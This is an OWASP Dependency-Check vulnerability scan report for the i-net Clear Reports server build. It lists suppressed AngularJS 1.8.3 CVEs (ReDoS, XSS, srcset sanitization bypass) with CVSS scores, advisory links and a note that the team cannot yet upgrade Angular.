



Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.

[How to read the report](#) | [Suppressing false positives](#) | [Getting Help: github issues](#)

## Project: project ':server'

clear-reports:server:26.4

Scan Information ([show all](#)):

- *dependency-check version:* 12.2.1
- *Report Generated On:* Fri, 24 Apr 2026 13:20:07 +0200
- *Dependencies Scanned:* 1604 (1498 unique)
- *Vulnerable Dependencies:* 0
- *Vulnerabilities Found:* 0
- *Vulnerabilities Suppressed:* 121 ([show](#))
- ...

## Summary

Summary of Vulnerable Dependencies ([click to show all](#))

| Dependency | Vulnerability IDs | Package | Highest Severity | CVE Count | Confidence | Evidence Count |
|------------|-------------------|---------|------------------|-----------|------------|----------------|
|------------|-------------------|---------|------------------|-----------|------------|----------------|

## Dependencies (vulnerable)

## Suppressed Vulnerabilities



remotegui.zip: angular-animate.jar: angular-animate.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller  
/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular-animate.jar/META-INF  
/resources/webjars/angular-animate/1.8.3/angular-animate.js

**MD5:** 31312b87e7226c8bf0714fcef0ea5d18

**SHA1:** dc9fb55f2c7f922c5ba83449266239ba1353db45

**SHA256:** 58e79e0e7cbb1e1502d216701e1fae41c405d92320aea1b68a223054096fda93

**Referenced In Project/Scope:** server

Evidence



Suppressed Identifiers

- None

## Suppressed Vulnerabilities



### [CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPPWSPSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPPWSPSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:\*:\*:\*:\*:\*

### [CVE-2024-21490](#) suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. \*\*Note:\*\* This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core).

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

[CVE-2022-25869](#) suppressed

All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSCORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

[CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
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- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)

- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2qgx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
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- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

**CVE-2023-26118** suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

**CVE-2024-8372** suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*

[CVE-2024-8373](#) suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqmn-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):



- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:linux:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:vsphere:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:windows:\*:\*

#### **CVE-2025-2336 (RETIREJS)** suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYaXx/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

#### **CVE-2025-4690 (RETIREJS)** suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

#### **CVE-2025-0716 (RETIREJS)** suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

#### **End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS)** suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

#### References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

### remotegui.zip: angular-animate.jar: angular-animate.min.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular-animate.jar/META-INF/resources/webjars/angular-animate/1.8.3/angular-animate.min.js

**MD5:** 5d2d0f42bb7e1b5503e914674f59dad0

**SHA1:** 4c15a58541e53c451c6f946d2048104f88b833c7

**SHA256:** 8e6202b1330a469a61ccdeebbd1cb3a20d0ecdfe8d106f68da5b85e9b67a1cd5

**Referenced In Project/Scope:** server

#### Evidence



#### Suppressed Identifiers

- None

#### Suppressed Vulnerabilities



[CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>



- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPPWSPSCSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCENTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:\*:\*:\*:\*:\*

#### [CVE-2024-21490](#) suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to `@angular/core` (<https://www.npmjs.com/package/@angular/core>).

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

#### [CVE-2022-25869](#) suppressed

All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN\\_LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

[CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
